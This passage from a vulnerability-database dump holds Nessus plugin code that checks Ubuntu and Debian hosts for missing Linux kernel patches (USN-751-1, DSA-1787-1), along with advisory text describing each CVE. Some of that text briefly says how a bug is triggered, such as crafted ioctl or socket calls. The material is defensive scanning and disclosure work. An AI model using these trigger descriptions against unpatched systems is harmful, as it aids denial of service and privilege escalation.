Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-751-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37337);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-4307\", \"CVE-2008-6107\", \"CVE-2009-0028\", \"CVE-2009-0031\", \"CVE-2009-0065\", \"CVE-2009-0269\", \"CVE-2009-0322\", \"CVE-2009-0605\", \"CVE-2009-0675\", \"CVE-2009-0676\", \"CVE-2009-0745\", \"CVE-2009-0746\", \"CVE-2009-0747\", \"CVE-2009-0748\", \"CVE-2009-0834\", \"CVE-2009-0835\", \"CVE-2009-0859\", \"CVE-2009-1046\");\n script_bugtraq_id(33113, 33672, 33846, 33948, 33951, 34020);\n script_xref(name:\"USN\", value:\"751-1\");\n\n script_name(english:\"Ubuntu 7.10 / 8.04 LTS / 8.10 : linux, linux-source-2.6.22 vulnerabilities (USN-751-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NFS did not correctly handle races between fcntl and interrupts. A\nlocal attacker on an NFS mount could consume unlimited kernel memory,\nleading to a denial of service. Ubuntu 8.10 was not affected.\n(CVE-2008-4307)\n\nSparc syscalls did not correctly check mmap regions. A local attacker\ncould cause a system panic, leading to a denial of service. Ubuntu\n8.10 was not affected. (CVE-2008-6107)\n\nIn certain situations, cloned processes were able to send signals to\nparent processes, crossing privilege boundaries. A local attacker\ncould send arbitrary signals to parent processes, leading to a denial\nof service. (CVE-2009-0028)\n\nThe kernel keyring did not free memory correctly. A local attacker\ncould consume unlimited kernel memory, leading to a denial of service.\n(CVE-2009-0031)\n\nThe SCTP stack did not correctly validate FORWARD-TSN packets. A\nremote attacker could send specially crafted SCTP traffic causing a\nsystem crash, leading to a denial of service. (CVE-2009-0065)\n\nThe eCryptfs filesystem did not correctly handle certain VFS return\ncodes. A local attacker with write-access to an eCryptfs filesystem\ncould cause a system crash, leading to a denial of service.\n(CVE-2009-0269)\n\nThe Dell platform device did not correctly validate user parameters. A\nlocal attacker could perform specially crafted reads to crash the\nsystem, leading to a denial of service. (CVE-2009-0322)\n\nThe page fault handler could consume stack memory. A local attacker\ncould exploit this to crash the system or gain root privileges with a\nKprobe registered. Only Ubuntu 8.10 was affected. (CVE-2009-0605)\n\nNetwork interfaces statistics for the SysKonnect FDDI driver did not\ncheck capabilities. A local user could reset statistics, potentially\ninterfering with packet accounting systems. (CVE-2009-0675)\n\nThe getsockopt function did not correctly clear certain parameters. A\nlocal attacker could read leaked kernel memory, leading to a loss of\nprivacy. (CVE-2009-0676)\n\nThe ext4 filesystem did not correctly clear group descriptors when\nresizing. A local attacker could exploit this to crash the system,\nleading to a denial of service. (CVE-2009-0745)\n\nThe ext4 filesystem did not correctly validate certain fields. A local\nattacker could mount a malicious ext4 filesystem, causing a system\ncrash, leading to a denial of service. (CVE-2009-0746, CVE-2009-0747,\nCVE-2009-0748)\n\nThe syscall interface did not correctly validate parameters when\ncrossing the 64-bit/32-bit boundary. A local attacker could bypass\ncertain syscall restricts via crafted syscalls. (CVE-2009-0834,\nCVE-2009-0835)\n\nThe shared memory subsystem did not correctly handle certain shmctl\ncalls when CONFIG_SHMEM was disabled. Ubuntu kernels were not\nvulnerable, since CONFIG_SHMEM is enabled by default. (CVE-2009-0859)\n\nThe virtual consoles did not correctly handle certain UTF-8 sequences.\nA local attacker on the physical console could exploit this to cause a\nsystem crash, leading to a denial of service. (CVE-2009-1046).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/751-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 189, 264, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-doc-2.6.27\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-openvz\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-ume\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-headers-2.6-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-cell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpia\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpiacompat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-openvz\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ume\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-debug-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-source-2.6.27\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2021 Canonical, Inc. / NASL script (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(7\\.10|8\\.04|8\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 7.10 / 8.04 / 8.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2008-4307\", \"CVE-2008-6107\", \"CVE-2009-0028\", \"CVE-2009-0031\", \"CVE-2009-0065\", \"CVE-2009-0269\", \"CVE-2009-0322\", \"CVE-2009-0605\", \"CVE-2009-0675\", \"CVE-2009-0676\", \"CVE-2009-0745\", \"CVE-2009-0746\", \"CVE-2009-0747\", \"CVE-2009-0748\", \"CVE-2009-0834\", \"CVE-2009-0835\", \"CVE-2009-0859\", \"CVE-2009-1046\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-751-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-doc-2.6.22\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-headers-2.6.22-16\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-headers-2.6.22-16-386\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-headers-2.6.22-16-generic\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-headers-2.6.22-16-rt\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-headers-2.6.22-16-server\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-headers-2.6.22-16-ume\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-headers-2.6.22-16-virtual\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-headers-2.6.22-16-xen\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-2.6.22-16-386\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-2.6.22-16-cell\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-2.6.22-16-generic\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-2.6.22-16-lpia\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-2.6.22-16-lpiacompat\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-2.6.22-16-rt\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-2.6.22-16-server\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-2.6.22-16-ume\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-2.6.22-16-virtual\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-2.6.22-16-xen\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-debug-2.6.22-16-386\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-debug-2.6.22-16-generic\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-debug-2.6.22-16-server\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-image-debug-2.6.22-16-virtual\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-kernel-devel\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"linux-source-2.6.22\", pkgver:\"2.6.22-16.62\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-doc-2.6.24\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-23\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-23-386\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-23-generic\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-23-openvz\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-23-rt\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-23-server\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-23-virtual\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-headers-2.6.24-23-xen\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-23-386\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-23-generic\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-23-lpia\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-23-lpiacompat\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-23-openvz\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-23-rt\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-23-server\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-23-virtual\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-2.6.24-23-xen\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-debug-2.6.24-23-386\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-debug-2.6.24-23-generic\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-debug-2.6.24-23-server\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-image-debug-2.6.24-23-virtual\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-kernel-devel\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"linux-source-2.6.24\", pkgver:\"2.6.24-23.52\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-doc-2.6.27\", pkgver:\"2.6.27-11.31\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-headers-2.6.27-11\", pkgver:\"2.6.27-11.31\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-headers-2.6.27-11-generic\", pkgver:\"2.6.27-11.31\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-headers-2.6.27-11-server\", pkgver:\"2.6.27-11.31\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-image-2.6.27-11-generic\", pkgver:\"2.6.27-11.31\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-image-2.6.27-11-server\", pkgver:\"2.6.27-11.31\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-image-2.6.27-11-virtual\", pkgver:\"2.6.27-11.31\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-libc-dev\", pkgver:\"2.6.27-11.31\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"linux-source-2.6.27\", pkgver:\"2.6.27-11.31\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-doc-2.6.22 / linux-doc-2.6.24 / linux-doc-2.6.27 / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-21T14:26:10", "description": "Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or privilege escalation. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2008-4307 Bryn M. Reeves reported a denial of service in the NFS filesystem. Local users can trigger a kernel BUG() due to a race condition in the do_setlk function.\n\n - CVE-2008-5079 Hugo Dias reported a DoS condition in the ATM subsystem that can be triggered by a local user by calling the svc_listen function twice on the same socket and reading /proc/net/atm/*vc.\n\n - CVE-2008-5395 Helge Deller discovered a denial of service condition that allows local users on PA-RISC systems to crash a system by attempting to unwind a stack containing userspace addresses.\n\n - CVE-2008-5700 Alan Cox discovered a lack of minimum timeouts on SG_IO requests, which allows local users of systems using ATA to cause a denial of service by forcing drives into PIO mode.\n\n - CVE-2008-5701 Vlad Malov reported an issue on 64-bit MIPS systems where a local user could cause a system crash by crafing a malicious binary which makes o32 syscalls with a number less than 4000.\n\n - CVE-2008-5702 Zvonimir Rakamaric reported an off-by-one error in the ib700wdt watchdog driver which allows local users to cause a buffer underflow by making a specially crafted WDIOC_SETTIMEOUT ioctl call.\n\n - CVE-2009-0028 Chris Evans discovered a situation in which a child process can send an arbitrary signal to its parent.\n\n - CVE-2009-0029 Christian Borntraeger discovered an issue effecting the alpha, mips, powerpc, s390 and sparc64 architectures that allows local users to cause a denial of service or potentially gain elevated privileges.\n\n - CVE-2009-0031 Vegard Nossum discovered a memory leak in the keyctl subsystem that allows local users to cause a denial of service by consuming all of kernel memory.\n\n - CVE-2009-0065 Wei Yongjun discovered a memory overflow in the SCTP implementation that can be triggered by remote users, permitting remote code execution.\n\n - CVE-2009-0269 Duane Griffin provided a fix for an issue in the eCryptfs subsystem which allows local users to cause a denial of service (fault or memory corruption).\n\n - CVE-2009-0322 Pavel Roskin provided a fix for an issue in the dell_rbu driver that allows a local user to cause a denial of service (oops) by reading 0 bytes from a sysfs entry.\n\n - CVE-2009-0675 Roel Kluin discovered inverted logic in the skfddi driver that permits local, unprivileged users to reset the driver statistics.\n\n - CVE-2009-0676 Clement LECIGNE discovered a bug in the sock_getsockopt function that may result in leaking sensitive kernel memory.\n\n - CVE-2009-0745 Peter Kerwien discovered an issue in the ext4 filesystem that allows local users to cause a denial of service (kernel oops) during a resize operation.\n\n - CVE-2009-0834 Roland McGrath discovered an issue on amd64 kernels that allows local users to circumvent system call audit configurations which filter based on the syscall numbers or argument details.\n\n - CVE-2009-0859 Jiri Olsa discovered that a local user can cause a denial of service (system hang) using a SHM_INFO shmctl call on kernels compiled with CONFIG_SHMEM disabled.\n This issue does not affect prebuilt Debian kernels.\n\n - CVE-2009-1046 Mikulas Patocka reported an issue in the console subsystem that allows a local user to cause memory corruption by selecting a small number of 3-byte UTF-8 characters.\n\n - CVE-2009-1192 Shaohua Li reported an issue in the AGP subsystem that may allow local users to read sensitive kernel memory due to a leak of uninitialized memory.\n\n - CVE-2009-1242 Benjamin Gilbert reported a local denial of service vulnerability in the KVM VMX implementation that allows local users to trigger an oops.\n\n - CVE-2009-1265 Thomas Pollet reported an overflow in the af_rose implementation that allows remote attackers to retrieve uninitialized kernel memory that may contain sensitive data.\n\n - CVE-2009-1337 Oleg Nesterov discovered an issue in the exit_notify function that allows local users to send an arbitrary signal to a process by running a program that modifies the exit_signal field and then uses an exec system call to launch a setuid application.\n\n - CVE-2009-1338 Daniel Hokka Zakrisson discovered that a kill(-1) is permitted to reach processes outside of the current process namespace.\n\n - CVE-2009-1439 Pavan Naregundi reported an issue in the CIFS filesystem code that allows remote users to overwrite memory via a long nativeFileSystem field in a Tree Connect response during mount.", "cvss3": {}, "published": "2009-05-04T00:00:00", "type": "nessus", "title": "Debian DSA-1787-1 : linux-2.6.24 - denial of service/privilege escalation/information leak", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4307", "CVE-2008-5079", "CVE-2008-5395", "CVE-2008-5700", "CVE-2008-5701", "CVE-2008-5702", "CVE-2009-0028", "CVE-2009-0029", "CVE-2009-0031", "CVE-2009-0065", "CVE-2009-0269", "CVE-2009-0322", "CVE-2009-0675", "CVE-2009-0676", "CVE-2009-0745", "CVE-2009-0834", "CVE-2009-0859", "CVE-2009-1046", "CVE-2009-1192", "CVE-2009-1242", "CVE-2009-1265", "CVE-2009-1337", "CVE-2009-1338", "CVE-2009-1439"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux-2.6.24", "cpe:/o:debian:debian_linux:4.0"], "id": "DEBIAN_DSA-1787.NASL", "href": "https://www.tenable.com/plugins/nessus/38668", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1787. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38668);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-4307\", \"CVE-2008-5079\", \"CVE-2008-5395\", \"CVE-2008-5700\", \"CVE-2008-5701\", \"CVE-2008-5702\", \"CVE-2009-0028\", \"CVE-2009-0029\", \"CVE-2009-0031\", \"CVE-2009-0065\", \"CVE-2009-0269\", \"CVE-2009-0322\", \"CVE-2009-0675\", \"CVE-2009-0676\", \"CVE-2009-0745\", \"CVE-2009-0834\", \"CVE-2009-0859\", \"CVE-2009-1046\", \"CVE-2009-1192\", \"CVE-2009-1242\", \"CVE-2009-1265\", \"CVE-2009-1337\", \"CVE-2009-1338\", \"CVE-2009-1439\");\n script_bugtraq_id(32676, 33113, 33672, 33846, 33951, 34020, 34405, 34453, 34654, 34673);\n script_xref(name:\"DSA\", value:\"1787\");\n\n script_name(english:\"Debian DSA-1787-1 : linux-2.6.24 - denial of service/privilege escalation/information leak\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service or privilege escalation. The Common\nVulnerabilities and Exposures project identifies the following\nproblems :\n\n - CVE-2008-4307\n Bryn M. Reeves reported a denial of service in the NFS\n filesystem. Local users can trigger a kernel BUG() due\n to a race condition in the do_setlk function.\n\n - CVE-2008-5079\n Hugo Dias reported a DoS condition in the ATM subsystem\n that can be triggered by a local user by calling the\n svc_listen function twice on the same socket and reading\n /proc/net/atm/*vc.\n\n - CVE-2008-5395\n Helge Deller discovered a denial of service condition\n that allows local users on PA-RISC systems to crash a\n system by attempting to unwind a stack containing\n userspace addresses.\n\n - CVE-2008-5700\n Alan Cox discovered a lack of minimum timeouts on SG_IO\n requests, which allows local users of systems using ATA\n to cause a denial of service by forcing drives into PIO\n mode.\n\n - CVE-2008-5701\n Vlad Malov reported an issue on 64-bit MIPS systems\n where a local user could cause a system crash by crafing\n a malicious binary which makes o32 syscalls with a\n number less than 4000.\n\n - CVE-2008-5702\n Zvonimir Rakamaric reported an off-by-one error in the\n ib700wdt watchdog driver which allows local users to\n cause a buffer underflow by making a specially crafted\n WDIOC_SETTIMEOUT ioctl call.\n\n - CVE-2009-0028\n Chris Evans discovered a situation in which a child\n process can send an arbitrary signal to its parent.\n\n - CVE-2009-0029\n Christian Borntraeger discovered an issue effecting the\n alpha, mips, powerpc, s390 and sparc64 architectures\n that allows local users to cause a denial of service or\n potentially gain elevated privileges.\n\n - CVE-2009-0031\n Vegard Nossum discovered a memory leak in the keyctl\n subsystem that allows local users to cause a denial of\n service by consuming all of kernel memory.\n\n - CVE-2009-0065\n Wei Yongjun discovered a memory overflow in the SCTP\n implementation that can be triggered by remote users,\n permitting remote code execution.\n\n - CVE-2009-0269\n Duane Griffin provided a fix for an issue in the\n eCryptfs subsystem which allows local users to cause a\n denial of service (fault or memory corruption).\n\n - CVE-2009-0322\n Pavel Roskin provided a fix for an issue in the dell_rbu\n driver that allows a local user to cause a denial of\n service (oops) by reading 0 bytes from a sysfs entry.\n\n - CVE-2009-0675\n Roel Kluin discovered inverted logic in the skfddi\n driver that permits local, unprivileged users to reset\n the driver statistics.\n\n - CVE-2009-0676\n Clement LECIGNE discovered a bug in the sock_getsockopt\n function that may result in leaking sensitive kernel\n memory.\n\n - CVE-2009-0745\n Peter Kerwien discovered an issue in the ext4 filesystem\n that allows local users to cause a denial of service\n (kernel oops) during a resize operation.\n\n - CVE-2009-0834\n Roland McGrath discovered an issue on amd64 kernels that\n allows local users to circumvent system call audit\n configurations which filter based on the syscall numbers\n or argument details.\n\n - CVE-2009-0859\n Jiri Olsa discovered that a local user can cause a\n denial of service (system hang) using a SHM_INFO shmctl\n call on kernels compiled with CONFIG_SHMEM disabled.\n This issue does not affect prebuilt Debian kernels.\n\n - CVE-2009-1046\n Mikulas Patocka reported an issue in the console\n subsystem that allows a local user to cause memory\n corruption by selecting a small number of 3-byte UTF-8\n characters.\n\n - 